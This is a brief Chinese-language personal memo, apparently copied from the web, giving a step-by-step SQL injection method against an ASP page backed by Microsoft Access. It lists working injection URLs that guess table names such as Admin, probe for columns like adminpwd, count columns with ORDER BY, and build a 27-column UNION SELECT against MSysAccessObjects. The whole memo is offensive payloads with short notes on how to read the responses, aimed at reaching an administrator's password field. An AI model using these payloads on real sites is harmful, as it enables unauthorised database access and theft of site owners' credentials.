方法从网上看来的,记下来以后看。
1,猜表名:
abc.asp?id=12 and 0 <= (select COUNT(*) from [User])
错误结果显示米有User表。
abc.asp?id=12 and 0 <= (select COUNT(*) from [Admin])
加载。。。,说明存在表Admin。
2,猜字段名:
abc.asp?id=12 and 0 <= (select COUNT(id) from [Admin])
加载。。。,说明表Admin有字段id。
abc.asp?id=12 and 0 <= (select COUNT(password) from [Admin])
abc.asp?id=12 and 0 <= (select COUNT(adminpwd) from [Admin])
加载。。。,说明表Admin有字段adminpwd。
3,查看字段个数
abc.asp?id=12 order by 10
加载
abc.asp?id=12 order by 20
加载
abc.asp?id=12 order by 27
加载
abc.asp?id=12 order by 28
说明表有27个字段
abc.asp?id=12 uNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,null,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
加载。。。。